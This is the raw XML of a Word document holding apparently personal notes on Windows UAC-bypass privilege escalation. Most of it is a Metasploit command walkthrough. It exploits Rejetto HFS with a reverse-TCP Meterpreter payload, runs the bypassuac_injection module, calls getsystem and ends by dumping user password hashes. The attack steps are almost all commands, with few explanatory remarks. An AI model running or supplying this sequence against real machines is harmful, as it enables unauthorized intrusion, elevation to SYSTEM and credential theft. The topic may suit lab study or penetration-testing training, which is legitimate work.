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B9C7" w14:textId="1D659076" w:rsidR="00853ABF" w:rsidRPr="00BC26A5" w:rsidRDefault="00C46722">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC26A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows Privilege Escalation Bypassing UAC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB0E331" w14:textId="0A78448C" w:rsidR="00B732EF" w:rsidRDefault="00B732EF">
      <w:r>
        <w:t>Very efficient technique, also present in the latest windows</w:t>
      </w:r>
      <w:r w:rsidR="00547E35">
        <w:t xml:space="preserve"> after windows vista.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C9922E" w14:textId="77777777" w:rsidR="00B732EF" w:rsidRDefault="00B732EF"/>
    <w:p w14:paraId="49045BCA" w14:textId="1A427920" w:rsidR="00BC26A5" w:rsidRDefault="00BC26A5">
      <w:r w:rsidRPr="00547E35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User account control</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> prevents unauthorized changes made to the operating system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A202041" w14:textId="77777777" w:rsidR="00BC26A5" w:rsidRDefault="00BC26A5"/>
    <w:p w14:paraId="7EB29138" w14:textId="3707552E" w:rsidR="00BC26A5" w:rsidRDefault="00BC26A5">
      <w:r>
        <w:t xml:space="preserve">Ensure changes to the operating system require approval </w:t>
      </w:r>
      <w:r w:rsidR="00547E35">
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the administrator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41564C1C" w14:textId="77777777" w:rsidR="00BC26A5" w:rsidRDefault="00BC26A5"/>
    <w:p w14:paraId="2F574797" w14:textId="6574A40C" w:rsidR="00BC26A5" w:rsidRPr="00547E35" w:rsidRDefault="00BC26A5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00547E35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4342682F" w14:textId="290612D4" w:rsidR="00BC26A5" w:rsidRDefault="00BC26A5">
      <w:r>
        <w:t>Windows escalate UAC protection bypass (in memory injection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342821CF" w14:textId="77777777" w:rsidR="00BC26A5" w:rsidRDefault="00BC26A5"/>
    <w:p w14:paraId="2C0EEA50" w14:textId="7A4263D0" w:rsidR="00BC26A5" w:rsidRDefault="00BC26A5">
      <w:r>
        <w:t xml:space="preserve">It disables the UAC and provides </w:t>
      </w:r>
      <w:r w:rsidR="00E47699">
        <w:t>another</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> meterpeter session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D38881A" w14:textId="366A0506" w:rsidR="00BC26A5" w:rsidRDefault="00BC26A5">
      <w:r>
        <w:t>Must meterpreter is x64 version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33643F86" w14:textId="77777777" w:rsidR="00BC26A5" w:rsidRDefault="00BC26A5"/>
    <w:p w14:paraId="79447111" w14:textId="313A366F" w:rsidR="00BC26A5" w:rsidRPr="00BC26A5" w:rsidRDefault="00BC26A5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC26A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2BB851" w14:textId="37FCA489" w:rsidR="00BC26A5" w:rsidRDefault="00BC26A5">
      <w:r>
        <w:t>Service postgresql start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9A04AC" w14:textId="76103141" w:rsidR="00BC26A5" w:rsidRDefault="00BC26A5">
      <w:r>
        <w:t>Msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097FB8BE" w14:textId="14B765F6" w:rsidR="00BC26A5" w:rsidRDefault="00BC26A5">
      <w:r>
        <w:t>Workspace -a UAC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F93254E" w14:textId="339EC55D" w:rsidR="00BC26A5" w:rsidRDefault="00BC26A5">
      <w:r>
        <w:t>Setg RHOSTS target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2637502A" w14:textId="26A4643C" w:rsidR="00BC26A5" w:rsidRDefault="00BC26A5">
      <w:r>
        <w:t>Workspace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E44D0D" w14:textId="77777777" w:rsidR="00617558" w:rsidRDefault="00617558"/>
    <w:p w14:paraId="7B600D72" w14:textId="013900E7" w:rsidR="00BC26A5" w:rsidRDefault="00BC26A5">
      <w:r>
        <w:t>Db_nmap -sV target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A06838" w14:textId="5917DD28" w:rsidR="00BC26A5" w:rsidRDefault="00617558">
      <w:r>
        <w:t>Search rejetto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310E9503" w14:textId="31292769" w:rsidR="00617558" w:rsidRDefault="00617558">
      <w:r>
        <w:t>Use (index no)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430780AC" w14:textId="2580FDD6" w:rsidR="00617558" w:rsidRDefault="00617558">
      <w:r>
        <w:t>Set payload windows/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11109BB9" w14:textId="5C30B7CB" w:rsidR="00617558" w:rsidRDefault="00B732EF">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0BB745" w14:textId="736B4AD8" w:rsidR="00B732EF" w:rsidRDefault="00B732EF">
      <w:r>
        <w:t>Run/exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F30325B" w14:textId="27F77D35" w:rsidR="00B732EF" w:rsidRDefault="00B732EF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>#it give the meterpreter session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63770D18" w14:textId="35C7B48E" w:rsidR="00B732EF" w:rsidRDefault="00B732EF">
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D032EBC" w14:textId="70FC0348" w:rsidR="00B732EF" w:rsidRDefault="00B732EF">
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B96D391" w14:textId="3D37B35D" w:rsidR="00B732EF" w:rsidRDefault="00B732EF">
      <w:r>
        <w:t>Getsystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E03230" w14:textId="6113551A" w:rsidR="00B732EF" w:rsidRDefault="00B732EF">
      <w:r>
        <w:t>#try to elevate priv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C327AE" w14:textId="77777777" w:rsidR="00B732EF" w:rsidRDefault="00B732EF"/>
    <w:p w14:paraId="54349E98" w14:textId="5E343DA1" w:rsidR="00B732EF" w:rsidRDefault="00B732EF">
      <w:r>
        <w:t>Getprivs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC609BA" w14:textId="7AC90D09" w:rsidR="00B732EF" w:rsidRDefault="00B732EF">
      <w:r>
        <w:t>#meterpreter command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1872CF8E" w14:textId="77777777" w:rsidR="00B732EF" w:rsidRDefault="00B732EF"/>
    <w:p w14:paraId="67984DDF" w14:textId="382DE5AA" w:rsidR="00B732EF" w:rsidRDefault="00B732EF">
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE0282E" w14:textId="54A0DDD5" w:rsidR="00B732EF" w:rsidRDefault="00B732EF">
      <w:r>
        <w:t>Net users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4C06A4" w14:textId="24BF7988" w:rsidR="00B732EF" w:rsidRDefault="00B732EF">
      <w:r>
        <w:t># display the users on the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE17441" w14:textId="77777777" w:rsidR="00B732EF" w:rsidRDefault="00B732EF"/>
    <w:p w14:paraId="3B9B3DD3" w14:textId="44CEC275" w:rsidR="00B732EF" w:rsidRDefault="00B732EF">
      <w:r>
        <w:t>Net localgroup administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8DE12B" w14:textId="536F4212" w:rsidR="00B732EF" w:rsidRDefault="00B732EF">
      <w:r>
        <w:t>#Show the members that are part of administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5BC516" w14:textId="77777777" w:rsidR="00B732EF" w:rsidRDefault="00B732EF"/>
    <w:p w14:paraId="2D837A8D" w14:textId="58463C7D" w:rsidR="00B732EF" w:rsidRDefault="00B732EF">
      <w:r>
        <w:t xml:space="preserve">#terminate the channel then </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1277ED6D" w14:textId="77777777" w:rsidR="00B732EF" w:rsidRDefault="00B732EF"/>
    <w:p w14:paraId="6A183986" w14:textId="6B5323EB" w:rsidR="00B732EF" w:rsidRDefault="00B732EF">
      <w:r>
        <w:t>#meterpreter session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1564535B" w14:textId="07FAB0F3" w:rsidR="00B732EF" w:rsidRDefault="00B732EF">
      <w:r>
        <w:t>background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6723B611" w14:textId="77777777" w:rsidR="00B732EF" w:rsidRDefault="00B732EF"/>
    <w:p w14:paraId="616DA315" w14:textId="6A0A4854" w:rsidR="00B732EF" w:rsidRDefault="00B732EF">
      <w:r>
        <w:t>sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5159E5DC" w14:textId="70595AC0" w:rsidR="00B732EF" w:rsidRDefault="00B732EF">
      <w:r>
        <w:t>search bypassuac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C084D7E" w14:textId="70373B91" w:rsidR="00B732EF" w:rsidRDefault="00B732EF">
      <w:r>
        <w:t>use (bypassuac_injection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019739A1" w14:textId="065CC97D" w:rsidR="00B732EF" w:rsidRDefault="00DB475F">
      <w:r>
        <w:t>set payload windows/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18296640" w14:textId="72C5C34F" w:rsidR="00DB475F" w:rsidRDefault="00DB475F">
      <w:r>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D225515" w14:textId="6303B049" w:rsidR="00DB475F" w:rsidRDefault="00DB475F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>set session id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E306D0" w14:textId="7024975F" w:rsidR="00DB475F" w:rsidRDefault="00DB475F">
      <w:r>
        <w:t># do not choice the port that is in use change it to new port. (session)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723B4D88" w14:textId="385341EB" w:rsidR="00BC26A5" w:rsidRDefault="00DB475F">
      <w:r>
        <w:t>Set LPORT 4433</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBF0C9A" w14:textId="1790BFFA" w:rsidR="00DB475F" w:rsidRDefault="00DB475F">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E36EC3A" w14:textId="53499606" w:rsidR="00E47699" w:rsidRDefault="00E47699">
      <w:r>
        <w:t>#error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE26B85" w14:textId="4224DEC3" w:rsidR="00E47699" w:rsidRDefault="00E47699">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B82C292" wp14:editId="4A15DD7A">
            <wp:extent cx="6515549" cy="172800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="145104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48257" name="Picture 14510482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1893" cy="19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DEA3" w14:textId="77777777" w:rsidR="00E47699" w:rsidRDefault="00E47699"/>
    <w:p w14:paraId="226CFD86" w14:textId="12973EEC" w:rsidR="00DB475F" w:rsidRDefault="00E47699">
      <w:r>
        <w:t xml:space="preserve">Set target </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224BDC25" w14:textId="558ABF33" w:rsidR="00E47699" w:rsidRDefault="00E47699">
      <w:r>
        <w:t>#show the targets we able to set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AC085F" w14:textId="77777777" w:rsidR="00E47699" w:rsidRDefault="00E47699"/>
    <w:p w14:paraId="4E7AFF0B" w14:textId="1F5F7797" w:rsidR="00E47699" w:rsidRDefault="00E47699">
      <w:r>
        <w:t>Set target windows\ x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE019EC" w14:textId="5B1D8FD8" w:rsidR="00E47699" w:rsidRDefault="00E47699">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D130D5" w14:textId="0AF4042E" w:rsidR="00E47699" w:rsidRDefault="00E47699">
      <w:r>
        <w:t>#now get the meterpreter session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E5E3C5" w14:textId="77777777" w:rsidR="00E47699" w:rsidRDefault="00E47699"/>
    <w:p w14:paraId="041CB13E" w14:textId="5C73558E" w:rsidR="00E47699" w:rsidRDefault="00E47699">
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A708D34" w14:textId="5F29020C" w:rsidR="00E47699" w:rsidRDefault="00E47699">
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E27443" w14:textId="77777777" w:rsidR="00E47699" w:rsidRDefault="00E47699"/>
    <w:p w14:paraId="6652F06F" w14:textId="5C94EA51" w:rsidR="00E47699" w:rsidRDefault="00E47699">
      <w:r>
        <w:t xml:space="preserve">Getsystem </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C5811B" w14:textId="43DE69F6" w:rsidR="00E47699" w:rsidRDefault="00E47699">
      <w:r>
        <w:t># Successfully elevate because the UAC was disabled and the user is a part of administrator group</w:t>
      </w:r>
      <w:r w:rsidR="00547E35">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63632343" w14:textId="77777777" w:rsidR="00E47699" w:rsidRDefault="00E47699"/>
    <w:p w14:paraId="1C4252F5" w14:textId="697F3364" w:rsidR="005A0056" w:rsidRDefault="005A0056">
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9F81AA" w14:textId="77777777" w:rsidR="005A0056" w:rsidRDefault="005A0056"/>
    <w:p w14:paraId="48570DDB" w14:textId="65F9EED6" w:rsidR="00BC752F" w:rsidRDefault="00BC752F">
      <w:r>
        <w:t>Hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4CA528" w14:textId="1C04D5A3" w:rsidR="00BC752F" w:rsidRDefault="00BC752F">
      <w:r>
        <w:t>#get the hashes of the users in system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AEEF98" w14:textId="77777777" w:rsidR="00BC752F" w:rsidRDefault="00BC752F"/>
    <w:sectPr w:rsidR="00BC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0E3"/>
    <w:rsid w:val="00547E35"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="005A0056"/>
    <w:rsid w:val="00617558"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00907CE9"/>
    <w:rsid w:val="00AD3672"/>
    <w:rsid w:val="00B732EF"/>
    <w:rsid w:val="00BC26A5"/>
    <w:rsid w:val="00BC752F"/>
    <w:rsid w:val="00C46722"/>
    <w:rsid w:val="00CB40E3"/>
    <w:rsid w:val="00D42D17"/>
    <w:rsid w:val="00DB475F"/>
    <w:rsid w:val="00E4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BC15C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FAD9534C-DBA3-44E4-95E1-CA22CD34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14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-09T10:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-10T06:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>